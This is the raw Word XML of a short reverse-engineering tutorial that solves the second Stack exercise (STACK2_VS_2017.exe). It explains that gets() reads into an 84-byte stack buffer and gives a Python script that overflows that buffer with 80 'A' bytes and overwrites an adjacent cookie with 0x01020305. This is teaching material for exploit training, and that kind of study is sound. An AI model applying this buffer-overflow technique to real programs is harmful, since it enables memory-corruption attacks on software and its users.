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AFB94" w14:textId="77777777" w:rsidR="00391647" w:rsidRPr="00391647" w:rsidRDefault="00391647" w:rsidP="00B75950">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00391647">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Now that we have solved the first exercise </w:t>
      </w:r>
      <w:hyperlink r:id="rId4">
        <w:r w:rsidRPr="00391647">
          <w:rPr>
            <w:color w:val="0000EE"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t xml:space="preserve">01 Stack </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00391647">
          <w:rPr>
            <w:color w:val="0000EE"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Nro</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="00391647">
          <w:rPr>
            <w:color w:val="0000EE"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t xml:space="preserve"> 1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00391647">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> we can move on to this second </w:t>
      </w:r>
      <w:r w:rsidRPr="00391647">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>STACK2_VS_2017</w:t>
      </w:r>
      <w:r w:rsidRPr="00391647">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C820DB1" w14:textId="77777777" w:rsidR="00DA71B0" w:rsidRPr="00391647" w:rsidRDefault="00DA71B0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7901F5DA" w14:textId="1C7DC306" w:rsidR="00591BBD" w:rsidRPr="00591BBD" w:rsidRDefault="00591BBD" w:rsidP="005C4DD1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00591BBD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>As in the previous exercise, at the beginning of the function</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00591BBD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0x54 (84) bytes are reserved to be used by local variables, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD90346" w14:textId="77777777" w:rsidR="00DA71B0" w:rsidRPr="00591BBD" w:rsidRDefault="00DA71B0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C5F55EB" w14:textId="77777777" w:rsidR="00DA71B0" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="0FD522F9" wp14:editId="7EAB52B1">
            <wp:extent cx="2438400" cy="4953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6FE8C6" w14:textId="77777777" w:rsidR="00DA71B0" w:rsidRDefault="00DA71B0"/>
    <w:p w14:paraId="12A91443" w14:textId="3C403B39" w:rsidR="00591BBD" w:rsidRPr="00591BBD" w:rsidRDefault="00591BBD" w:rsidP="00470877">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00591BBD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">There is also a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00591BBD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MessageBox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00591BBD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> that we must accept so that a message with the buffer and cookie addresses is then printed on the console</w:t>
      </w:r>
      <w:r w:rsidRPr="00591BBD">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612D790C" w14:textId="77777777" w:rsidR="00DA71B0" w:rsidRPr="00591BBD" w:rsidRDefault="00DA71B0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55E37801" w14:textId="5CEFC31D" w:rsidR="00591BBD" w:rsidRPr="00591BBD" w:rsidRDefault="00591BBD" w:rsidP="00F50F5D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00591BBD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">A pointer is then passed as an argument at the beginning of the variable </w:t>
      </w:r>
      <w:r w:rsidRPr="00591BBD">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>var_54</w:t>
      </w:r>
      <w:r w:rsidRPr="00591BBD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the gets function</w:t>
      </w:r>
      <w:r w:rsidRPr="00591BBD">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00591BBD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's rename this variable as </w:t>
      </w:r>
      <w:r w:rsidRPr="00591BBD">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">buffer, </w:t>
      </w:r>
      <w:r w:rsidRPr="00591BBD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">I stand up and press the </w:t>
      </w:r>
      <w:r w:rsidRPr="00591BBD">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="00591BBD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> key  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidRPr="00591BBD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> rename it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C2C64A" w14:textId="77777777" w:rsidR="00DA71B0" w:rsidRPr="00591BBD" w:rsidRDefault="00DA71B0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F3DEAC8" w14:textId="77777777" w:rsidR="00DA71B0" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="0D9055E7" wp14:editId="753C2D4C">
            <wp:extent cx="5067300" cy="31051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105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3CA127" w14:textId="77777777" w:rsidR="00591BBD" w:rsidRDefault="00591BBD" w:rsidP="008164C0"/>
    <w:p w14:paraId="48FF5093" w14:textId="05C2F78A" w:rsidR="00591BBD" w:rsidRPr="00591BBD" w:rsidRDefault="00591BBD" w:rsidP="008164C0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00591BBD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The only thing that changes here is the value against which the </w:t>
      </w:r>
      <w:r w:rsidRPr="00591BBD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00591BBD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is compared, it is now  </w:t>
      </w:r>
      <w:r w:rsidRPr="00591BBD">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x01020305</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DF6DBA" w14:textId="77777777" w:rsidR="00DA71B0" w:rsidRPr="00591BBD" w:rsidRDefault="00DA71B0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5729F401" w14:textId="77777777" w:rsidR="00591BBD" w:rsidRPr="00591BBD" w:rsidRDefault="00591BBD" w:rsidP="00B03FE3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00591BBD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>My python script would look like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5B7B5F" w14:textId="77777777" w:rsidR="00591BBD" w:rsidRPr="00591BBD" w:rsidRDefault="00591BBD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F8D667C" w14:textId="77777777" w:rsidR="00DA71B0" w:rsidRPr="00391647" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00391647">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00391647">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sys</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6EA1A86B" w14:textId="77777777" w:rsidR="00DA71B0" w:rsidRPr="00391647" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00391647">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>from subprocess import Popen, PIPE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC6F6FF" w14:textId="77777777" w:rsidR="00DA71B0" w:rsidRPr="00391647" w:rsidRDefault="00DA71B0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a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DA71B0" w:rsidRPr="00391647" w14:paraId="3833E9B6" w14:textId="77777777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E84A7" w14:textId="77777777" w:rsidR="00DA71B0" w:rsidRPr="003916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391647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buffer = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00391647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b"A</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00391647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"</w:t>
            </w:r>
            <w:r w:rsidRPr="00391647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* </w:t>
            </w:r>
            <w:r w:rsidRPr="00391647">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D36363"/>
                <w:shd w:val="clear" w:color="auto" w:fill="333333"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>80</w:t>
            </w:r>
            <w:r w:rsidRPr="00391647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cookie = </w:t>
            </w:r>
            <w:r w:rsidRPr="00391647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b"\x05\x03\x02\x01"</w:t>
            </w:r>
            <w:r w:rsidRPr="00391647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</w:r>
            <w:r w:rsidRPr="00391647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>payload = buffer + cookie</w:t>
            </w:r>
            <w:r w:rsidRPr="00391647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</w:r>
            <w:r w:rsidRPr="00391647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</w:r>
            <w:r w:rsidRPr="00391647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lastRenderedPageBreak/>
              <w:t>p1 = Popen(</w:t>
            </w:r>
            <w:r w:rsidRPr="00391647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"STACK2_VS_2017.exe"</w:t>
            </w:r>
            <w:r w:rsidRPr="00391647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, stdin=PIPE)</w:t>
            </w:r>
            <w:r w:rsidRPr="00391647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</w:r>
            <w:r w:rsidRPr="00391647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print</w:t>
            </w:r>
            <w:r w:rsidRPr="00391647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(</w:t>
            </w:r>
            <w:r w:rsidRPr="00391647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"PID: %s"</w:t>
            </w:r>
            <w:r w:rsidRPr="00391647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% hex(p1.pid))</w:t>
            </w:r>
            <w:r w:rsidRPr="00391647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</w:r>
            <w:r w:rsidRPr="00391647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print</w:t>
            </w:r>
            <w:r w:rsidRPr="00391647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(</w:t>
            </w:r>
            <w:r w:rsidRPr="00391647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"Enter para continuar"</w:t>
            </w:r>
            <w:r w:rsidRPr="00391647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)</w:t>
            </w:r>
            <w:r w:rsidRPr="00391647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</w:r>
            <w:r w:rsidRPr="00391647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>p1.communicate(payload)</w:t>
            </w:r>
            <w:r w:rsidRPr="00391647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>p1.wait()</w:t>
            </w:r>
            <w:r w:rsidRPr="00391647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>input()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3A99CC4D" w14:textId="77777777" w:rsidR="00DA71B0" w:rsidRPr="00391647" w:rsidRDefault="00DA71B0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="393F7001" w14:textId="77777777" w:rsidR="00DA71B0" w:rsidRPr="00391647" w:rsidRDefault="00DA71B0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51B89B85" w14:textId="77777777" w:rsidR="00DA71B0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20A2A729" wp14:editId="1AF38EC3">
            <wp:extent cx="4953000" cy="12573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333042" w14:textId="77777777" w:rsidR="00DA71B0" w:rsidRDefault="00DA71B0">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0218E350" w14:textId="77777777" w:rsidR="00DA71B0" w:rsidRDefault="00DA71B0">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00DA71B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1B0"/>
    <w:rsid w:val="00391647"/>
    <w:rsid w:val="00591BBD"/>
    <w:rsid w:val="00DA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DA859"/>
  <w15:docId w15:val="{185ECE91-794A-45C4-92E6-C583FC1D8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ocs.google.com/document/d/1s28WppAv2U55NWb4uhFO55tlA0ORz4FjiG1deznUwkI/edit?usp=shar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170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Esteban Kazimirow</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-07-24T16:50:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-07-24T16:55:00Z</dcterms:modified>
</cp:coreProperties>
</file>